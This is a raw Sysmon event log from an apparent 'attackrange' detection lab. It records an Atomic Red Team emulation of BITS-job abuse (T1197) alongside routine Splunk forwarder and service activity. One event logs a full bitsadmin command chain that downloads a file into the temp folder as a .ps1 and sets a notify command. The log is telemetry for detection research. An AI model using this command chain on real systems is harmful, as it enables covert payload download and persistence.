10341000x80000000000000001061887Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.229{7F8C56E7-4E3C-6063-1600-00000000AF01}12801520C:\Windows\system32\svchost.exe{7F8C56E7-52CD-6063-4901-00000000AF01}5452C:\Windows\system32\bitsadmin.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061886Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.229{7F8C56E7-4E3C-6063-1600-00000000AF01}12801320C:\Windows\system32\svchost.exe{7F8C56E7-52CD-6063-4901-00000000AF01}5452C:\Windows\system32\bitsadmin.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061885Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.213{7F8C56E7-4F87-6063-CA00-00000000AF01}55846056C:\Windows\system32\conhost.exe{7F8C56E7-52CD-6063-4901-00000000AF01}5452C:\Windows\system32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061884Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.213{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061883Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.213{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061882Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.213{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061881Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.213{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061880Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.213{7F8C56E7-4E4F-6063-5500-00000000AF01}38244020C:\Windows\system32\csrss.exe{7F8C56E7-52CD-6063-4901-00000000AF01}5452C:\Windows\system32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061879Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.213{7F8C56E7-52C8-6063-4301-00000000AF01}43924396C:\Windows\system32\cmd.exe{7F8C56E7-52CD-6063-4901-00000000AF01}5452C:\Windows\system32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061878Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.216{7F8C56E7-52CD-6063-4901-00000000AF01}5452C:\Windows\System32\bitsadmin.exe7.8.14393.0 (rs1_release.160715-1616)BITS administration utilityMicrosoft® Windows® Operating SystemMicrosoft Corporationbitsadmin.exebitsadmin.exe /complete AtomicBITS C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{7F8C56E7-4E65-6063-912A-070000000000}0x72a912HighMD5=F548717B821860C2B2242367732FE105,SHA256=E1057A20945BCE8F00C0BE5E3DB40C4A98AB33F42F4D2DF919AEDB0EF6651D6E,IMPHASH=CE0EB5030AA7D3C8606F11BBCA0BC912{7F8C56E7-52C8-6063-4301-00000000AF01}4392C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /create AtomicBITS & bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %temp%\bitsadmin3_flag.ps1 & bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe "" & bitsadmin.exe /resume AtomicBITS & timeout 5 & bitsadmin.exe /complete AtomicBITS" 23542300x8000000000000000246554Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:17.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CB14E0DAC1AEFB20345B0791C595EB4,SHA256=6DEC9D01B15D22AF94BB3B4AB403A20A2820C0E2548E1CD2D0EA9BCA2364EB03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061913Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:18.963{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A79C4A0EE80CA3DD38AA1F794FD958C0,SHA256=B31878B0B911DD2E31D9B8C89B8AA515F8300D0AE44107885B2D4BE8A7A99064,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061912Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:15.976{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54861-false10.0.1.12-8000- 23542300x80000000000000001061911Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:18.276{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD572BA8ECC00D716DBF369A419DD516,SHA256=F1023AD110D749B046007D530B8B3BFF3AB9E3D3FB08CEFCD8C791C266377AA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246555Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:18.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50A9953A4218E82F1FC4D86137610751,SHA256=F7EA088AD3B5A5A90FDB7555702161D224DC851A324DB20178F4E7035AB4AB0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061914Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:19.635{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A9C1699B58457314E03E5439325DC86,SHA256=1A9C7168F59D5108047A17A3EADC056D11AEDC77AA5AF609AE9778859441BA4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246556Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:19.148{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91FD0201EEBFC2C9756B79D4DE77B72E,SHA256=B42C3CFF2C1BE50B2EDD05D254BB95630EB540D687CDA742CA8A76E8E9420767,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246570Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:20.961{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-52D0-6063-CD22-00000000AF01}3588C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246569Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:20.961{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246568Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:20.961{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246567Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:20.961{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246566Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:20.961{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246565Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:20.961{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246564Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:20.961{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246563Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:20.961{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246562Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:20.961{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246561Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:20.961{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246560Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:20.961{CB4067E1-304A-6062-0500-00000000AF01}392508C:\Windows\system32\csrss.exe{CB4067E1-52D0-6063-CD22-00000000AF01}3588C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246559Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:20.961{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-52D0-6063-CD22-00000000AF01}3588C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246558Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:20.961{CB4067E1-52D0-6063-CD22-00000000AF01}3588C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246557Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:20.148{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D54DA41CC9B756E4CA3CA4EBCD126CC8,SHA256=EF40C98D5FDF171DDDA0909C51158300B9F14C92CF3600EDF13290EEED5CF15F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061917Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.867{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54862-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local389ldap 354300x80000000000000001061916Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.867{7F8C56E7-4E4C-6063-2F00-00000000AF01}988C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54862-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local389ldap 